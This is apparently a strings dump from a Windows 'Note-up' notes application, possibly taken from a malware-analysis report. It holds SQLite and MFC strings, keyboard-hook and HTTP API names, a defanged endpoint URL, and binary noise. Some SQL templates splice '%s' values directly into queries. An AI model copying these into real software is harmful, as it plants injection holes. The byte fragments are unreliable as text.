SCAN TABLE %s%s%s
sqlite3_get_table() called with two or more incompatible queries
sqlite3_get_table() called with two or more incompatible queries
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor did not declare schema: %s
vtable constructor did not declare schema: %s
vtable constructor failed: %s
vtable constructor failed: %s
vtable constructor called recursively: %s
vtable constructor called recursively: %s
no such module: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
table %s: xBestIndex returned an invalid plan
ANY(%s)
ANY(%s)
VIRTUAL TABLE INDEX %d:%s
VIRTUAL TABLE INDEX %d:%s
USING INTEGER PRIMARY KEY
USING INTEGER PRIMARY KEY
INDEX %s
INDEX %s
COVERING INDEX %s
COVERING INDEX %s
PRIMARY KEY
PRIMARY KEY
AS %s
AS %s
TABLE %s
TABLE %s
SUBQUERY %d
SUBQUERY %d
%s.xBestIndex() malfunction
%s.xBestIndex() malfunction
database corruption at line %d of [%.10s]
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
cannot open file at line %d of [%.10s]
d-d-d d:d:d
d-d-d d:d:d
d:d:d
d:d:d
d-d-d
d-d-d
M@failed to allocate %u bytes of memory
M@failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
failed memory resize %u to %u bytes
recovered %d frames from WAL file %s
recovered %d frames from WAL file %s
bind on a busy prepared statement: [%s]
bind on a busy prepared statement: [%s]
%s: %s.%s.%s
%s: %s.%s.%s
misuse of aliased aggregate %s
misuse of aliased aggregate %s
not authorized to use function: %s
not authorized to use function: %s
too many terms in %s BY clause
too many terms in %s BY clause
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
Cannot add a PRIMARY KEY column
Cannot add a PRIMARY KEY column
CREATE TABLE %Q.%s(%s)
CREATE TABLE %Q.%s(%s)
%s - %s
%s - %s
malformed database schema (%s)
malformed database schema (%s)
%s-shm
%s-shm
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Failed to read ptrmap key=%d
Failed to read ptrmap key=%d
failed to get page %d
failed to get page %d
%d of %d pages missing from overflow list starting at %d
%d of %d pages missing from overflow list starting at %d
freelist leaf count too big on page %d
freelist leaf count too big on page %d
%s %T cannot reference objects in database %s
%s %T cannot reference objects in database %s
view %s is circularly defined
view %s is circularly defined
LIMIT clause should come after %s not before
LIMIT clause should come after %s not before
ORDER BY clause should come after %s not before
ORDER BY clause should come after %s not before
no such table: %s
no such table: %s
%s.%s.%s
%s.%s.%s
too many references to "%s": max 65535
too many references to "%s": max 65535
sqlite_sq_%p
sqlite_sq_%p
automatic index on %s(%s)
automatic index on %s(%s)
no such vfs: %s
no such vfs: %s
%s mode not allowed: %s
%s mode not allowed: %s
no such %s mode: %s
no such %s mode: %s
recovered %d pages from %s
recovered %d pages from %s
unknown database: %s
unknown database: %s
Fragmentation of %d bytes reported as %d on page %d
Fragmentation of %d bytes reported as %d on page %d
Multiple uses for byte %u of page %d
Multiple uses for byte %u of page %d
Corruption detected in cell %d on page %d
Corruption detected in cell %d on page %d
On page %d at right child:
On page %d at right child:
On tree page %d cell %d:
On tree page %d cell %d:
unable to get the page. error code=%d
unable to get the page. error code=%d
btreeInitPage() returns error code %d
btreeInitPage() returns error code %d
Page %d:
Page %d:
Outstanding page count goes from %d to %d during this analysis
Outstanding page count goes from %d to %d during this analysis
Pointer map page %d is referenced
Pointer map page %d is referenced
Page %d is never used
Page %d is never used
unable to identify the object to be reindexed
unable to identify the object to be reindexed
cannot create INSTEAD OF trigger on table: %S
cannot create INSTEAD OF trigger on table: %S
cannot create %s trigger on view: %S
cannot create %s trigger on view: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
at most %d tables in a join
at most %d tables in a join
unknown database %s
unknown database %s
there is already another table or index with this name: %s
there is already another table or index with this name: %s
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
sqlite_sequence
sqlite_sequence
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
view %s may not be altered
view %s may not be altered
sqlite_altertab_%s
sqlite_altertab_%s
there is already an index named %s
there is already an index named %s
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
CREATE%s INDEX %.*s
CREATE%s INDEX %.*s
table %s has no column named %s
table %s has no column named %s
sqlite_autoindex_%s_%d
sqlite_autoindex_%s_%d
index %s already exists
index %s already exists
there is already a table named %s
there is already a table named %s
virtual tables may not be indexed
virtual tables may not be indexed
views may not be indexed
views may not be indexed
table %s may not be indexed
table %s may not be indexed
cannot create a TEMP index on non-TEMP table "%s"
cannot create a TEMP index on non-TEMP table "%s"
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
no such index: %S
no such index: %S
no such trigger: %S
no such trigger: %S
MJ delete: %s
MJ delete: %s
-mjX9X
-mjX9X
MJ collide: %s
MJ collide: %s
%s-mjXXXXXX9XXz
%s-mjXXXXXX9XXz
EXECUTE %s%s SUBQUERY %d
EXECUTE %s%s SUBQUERY %d
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
table "%s" has more than one primary key
table "%s" has more than one primary key
CREATE TABLE %Q.sqlite_sequence(name,seq)
CREATE TABLE %Q.sqlite_sequence(name,seq)
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE %s %.*s
CREATE %s %.*s
PRIMARY KEY missing on table %s
PRIMARY KEY missing on table %s
unable to open database: %s
unable to open database: %s
database %s is already in use
database %s is already in use
too many attached databases - max %d
too many attached databases - max %d
database %s is locked
database %s is locked
cannot detach database %s
cannot detach database %s
no such database: %s
no such database: %s
unsupported encoding: %s
unsupported encoding: %s
NULL value in %s.%s
NULL value in %s.%s
*** in database %s ***
*** in database %s ***
misuse of aggregate: %s()
misuse of aggregate: %s()
no such column: %s
no such column: %s
%d values for %d columns
%d values for %d columns
table %S has %d columns but %d values were supplied
table %S has %d columns but %d values were supplied
table %S has no column named %s
table %S has no column named %s
-- TRIGGER %s
-- TRIGGER %s
use DROP VIEW to delete view %s
use DROP VIEW to delete view %s
use DROP TABLE to delete table %s
use DROP TABLE to delete table %s
table %s may not be dropped
table %s may not be dropped
sqlite_stat
sqlite_stat
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
database schema is locked: %s
database schema is locked: %s
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
PRAGMA vacuum_db.synchronous=OFF
PRAGMA vacuum_db.synchronous=OFF
cannot VACUUM - SQL statements in progress
cannot VACUUM - SQL statements in progress
abort at %d in [%s]: %s
abort at %d in [%s]: %s
%s constraint failed
%s constraint failed
%s constraint failed: %s
%s constraint failed: %s
statement aborts at %d: [%s] %s
statement aborts at %d: [%s] %s
database table is locked: %s
database table is locked: %s
cannot change %s wal mode from within a transaction
cannot change %s wal mode from within a transaction
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot commit transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
cannot release savepoint - SQL statements in progress
cannot release savepoint - SQL statements in progress
no such savepoint: %s
no such savepoint: %s
cannot open savepoint - SQL statements in progress
cannot open savepoint - SQL statements in progress
cannot open value of type %s
cannot open value of type %s
cannot open %s column for writing
cannot open %s column for writing
no such column: "%s"
no such column: "%s"
cannot open view: %s
cannot open view: %s
cannot open table without rowid: %s
cannot open table without rowid: %s
cannot open virtual table: %s
cannot open virtual table: %s
indexed
indexed
foreign key
foreign key
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
unsupported file format
unsupported file format
no such table column: %s.%s
no such table column: %s.%s
CCmdTarget
CCmdTarget
CNotSupportedException
CNotSupportedException
CMFCVisualManagerWindows
CMFCVisualManagerWindows
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
RegDeleteKeyExW
CMDIFrameWndEx
CMDIFrameWndEx
TaskDialogIndirect
TaskDialogIndirect
CMDITabProxyWnd
CMDITabProxyWnd
CMDIChildWndEx
CMDIChildWndEx
CMDIChildWnd
CMDIChildWnd
CMDIFrameWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMDIClientAreaWnd
CMFCToolBarsKeyboardPropertyPage
CMFCToolBarsKeyboardPropertyPage
GetProcessWindowStation
GetProcessWindowStation
operator
operator
portuguese-brazilian
portuguese-brazilian
CWebBrowser2
CWebBrowser2
()$^.* ?[]|\-{},:=!
()$^.* ?[]|\-{},:=!
Winhttp.dll
Winhttp.dll
WinHttpCrackUrl
WinHttpCrackUrl
Wininet.dll
Wininet.dll
HttpSendRequestW
HttpSendRequestW
HttpOpenRequestW
HttpOpenRequestW
INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
INSERT INTO %s (email) VALUES ('%s')
INSERT INTO %s (email) VALUES ('%s')
SELECT date_time, reminder_date_time, name, location, notes, send_email, id from %s where user_id = %u
SELECT date_time, reminder_date_time, name, location, notes, send_email, id from %s where user_id = %u
SELECT email from %s where id = %u
SELECT email from %s where id = %u
UPDATE %s SET email = '%s' WHERE id = %u
UPDATE %s SET email = '%s' WHERE id = %u
INSERT INTO %s (date_time, reminder_date_time, name, location, notes, send_email, user_id) VALUES ('%s', '%s', '%s', '%s', '%s', %i, %u)
INSERT INTO %s (date_time, reminder_date_time, name, location, notes, send_email, user_id) VALUES ('%s', '%s', '%s', '%s', '%s', %i, %u)
DELETE FROM %s WHERE id = %u
DELETE FROM %s WHERE id = %u
SELECT date_time, reminder_date_time, name, location, notes, send_email, user_id from %s where id = %u
SELECT date_time, reminder_date_time, name, location, notes, send_email, user_id from %s where id = %u
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExW
CreateDialogIndirectParamW
CreateDialogIndirectParamW
GetAsyncKeyState
GetAsyncKeyState
MapVirtualKeyW
MapVirtualKeyW
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardState
GetKeyboardState
GetKeyNameTextW
GetKeyNameTextW
MapVirtualKeyExW
MapVirtualKeyExW
USER32.dll
USER32.dll
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
MSIMG32.dll
MSIMG32.dll
COMDLG32.dll
COMDLG32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegOpenKeyW
RegOpenKeyW
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyW
RegEnumKeyW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
SHLWAPI.dll
SHLWAPI.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
OLEACC.dll
OLEACC.dll
IMM32.dll
IMM32.dll
WINMM.dll
WINMM.dll
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCOleException@@
.PAVCOleException@@
.PAVCObject@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.?AVCMFCVisualManagerWindows@@
.?AVCMFCVisualManagerWindows@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCToolBarCmdUI@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMDIFrameWnd@@
.?AVCMFCColorBarCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.PAVCFileException@@
.PAVCFileException@@
.?AVCMDITabProxyWnd@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIChildWnd@@
.?AVCMFCCmdUsageCount@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCRibbonKeyTip@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
zcÃ
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCWebBrowser2@@
.?AVCWebBrowser2@@
.PAVCException@@
.PAVCException@@
.?AV?$_Ref_count_del@Usqlite3@@P6AHPAU1@@Z@tr1@std@@
.?AV?$_Ref_count_del@Usqlite3@@P6AHPAU1@@Z@tr1@std@@
.P6AHPAUsqlite3@@@Z
.P6AHPAUsqlite3@@@Z
1JTCP
1JTCP
p.qN3
p.qN3
.IDAT
.IDAT
.IDATH
.IDATH
AYO.xXO
AYO.xXO
~:v.zgu}7
~:v.zgu}7
s',%f
s',%f
3%Cn,
3%Cn,
&I.Ibr
&I.Ibr
HOJ.oa
HOJ.oa
u.vjB
u.vjB
}j.jX
}j.jX
cdl6.ptQf
cdl6.ptQf
d\'.tA
d\'.tA
s?.jP
s?.jP
p.qNs2cC
p.qNs2cC
.QzY(
.QzY(
O\.gA
O\.gA
.YRar
.YRar
B%f#X
B%f#X
..nax
..nax
.mQ$(Xt
.mQ$(Xt
.MaeI
.MaeI
.HtCE
.HtCE
~%Uu ,
~%Uu ,
kJ%UN
kJ%UN
".igLO
".igLO
%FPf!
%FPf!
*"%Dv
*"%Dv
#c$D%f
#c$D%f
,D.Zl
,D.Zl
.yK]EW
.yK]EW
\.Wnp`p(
\.Wnp`p(
=9=%{.mnWw/
=9=%{.mnWw/
X${.mn:
X${.mn:
23[.Iq&
23[.Iq&
v`.Ko
v`.Ko
q.Ko#
q.Ko#
PFTI%f
PFTI%f
6wv.TD
6wv.TD
V.mE&Qs;
V.mE&Qs;
Q`.vc
Q`.vc
R%FO8
R%FO8
.aCBC
.aCBC
WINDOWS7_
WINDOWS7_
Windows7
Windows7
777888999888666
777888999888666
2,3034383
2,3034383
8Â8
8Â8
8"808=8{8
8"808=8{8
; ;&;-;3;
; ;&;-;3;
9%9X9s9z9
9%9X9s9z9
:3;\;};6
:3;\;};6
8!8-83898?8
8!8-83898?8
6'7-767=7
6'7-767=7
9Â9j9
9Â9j9
<.>
<.>
3!3,323:3\3~3
3!3,323:3\3~3
8Â8v8D9W;i;r;
8Â8v8D9W;i;r;
0&1.161>1~1
0&1.161>1~1
8!8%8)8-81858
8!8%8)8-81858
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
? ?$?(?,?0?4?8?
? ?$?(?,?0?4?8?
= =$=(=,=0=4=8=
= =$=(=,=0=4=8=
9 9(909
9 9(909
=$=,=8=\=|=
=$=,=8=\=|=
= =@=\=`=
= =@=\=`=
3 383\3|3
3 383\3|3
5 5$5(5,5054585
5 5$5(5,5054585
accKeyboardShortcut
accKeyboardShortcut
wuser32.dll
wuser32.dll
hhctrl.ocx
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
Afx:%p:%x
commctrl_DragListMsg
commctrl_DragListMsg
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
KERNEL32.DLL
KERNEL32.DLL
%s%s.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
lX-X-x-XX-XXXXXX
UxTheme.dll
UxTheme.dll
@%d%%
@%d%%
Advapi32.dll
Advapi32.dll
Jcomctl32.dll
Jcomctl32.dll
Jcomdlg32.dll
Jcomdlg32.dll
Jshell32.dll
Jshell32.dll
mfcm100u.dll
mfcm100u.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
SHELL32.DLL
SHELL32.DLL
lXXxXXXXXXXX
lXXxXXXXXXXX
dwmapi.dll
dwmapi.dll
eShell32.dll
eShell32.dll
%s:%x:%x:%x:%x
%s:%x:%x:%x:%x
%sMFCToolBar-%d%x
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBar-%d
%sMFCToolBarParameters
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
TOOLBAR_RESETKEYBAORD
%sDockingManager-%d
%sDockingManager-%d
&%d %s
&%d %s
MSG_CHECKEMPTYMINIFRAME
MSG_CHECKEMPTYMINIFRAME
%sPane-%d%x
%sPane-%d%x
%sPane-%d
%sPane-%d
USER32.DLL
USER32.DLL
MHex={X,X,X}
MHex={X,X,X}
kernel32.dll
kernel32.dll
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
MFCLink_UrlPrefix
MFCLink_UrlPrefix
MFCLink_Url
MFCLink_Url
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
COMCTL32.DLL
COMCTL32.DLL
KeyboardManager
KeyboardManager
%sBasePane-%d%x
%sBasePane-%d%x
%sBasePane-%d
%sBasePane-%d
ShowCmd
ShowCmd
M%sMFCOutlookBar-%d%x
M%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sMFCOutlookBar-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
%c%d%c%s
%c%d%c%s
URICHED20.DLL
URICHED20.DLL
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
windows
windows
Vf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
Vf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
%sMDIClientArea-%d
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
RGB(%d, %d, %d)
RGB(%d, %d, %d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
ENABLE_KEYS
ENABLE_KEYS
KEYS_MENU
KEYS_MENU
KEYS
KEYS
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
%sMFCTasksPane-%d
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
\Note-UP.db
\Note-UP.db
@c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin1.inl
@c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin1.inl
%s (%s:%d)
%s (%s:%d)
%d.%m.%Y %H:%M
%d.%m.%Y %H:%M
Content-Type: application/x-www-form-urlencoded; charset=utf-8;
Content-Type: application/x-www-form-urlencoded; charset=utf-8;
hXXp://note-up.com/controllers/json_parser.php
hXXp://note-up.com/controllers/json_parser.php
Today, %m/%d/%Y at %I:%M %p
Today, %m/%d/%Y at %I:%M %p
%A, %m/%d/%Y at %I:%M %p
%A, %m/%d/%Y at %I:%M %p
v=1&tid=UA-66670216-1&cid=%s&t=event&ec=%s&ea=%s
v=1&tid=UA-66670216-1&cid=%s&t=event&ec=%s&ea=%s
hXXp://VVV.google-analytics.com/collect?
hXXp://VVV.google-analytics.com/collect?
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
%Program Files%\Note-up\Note-up.exe
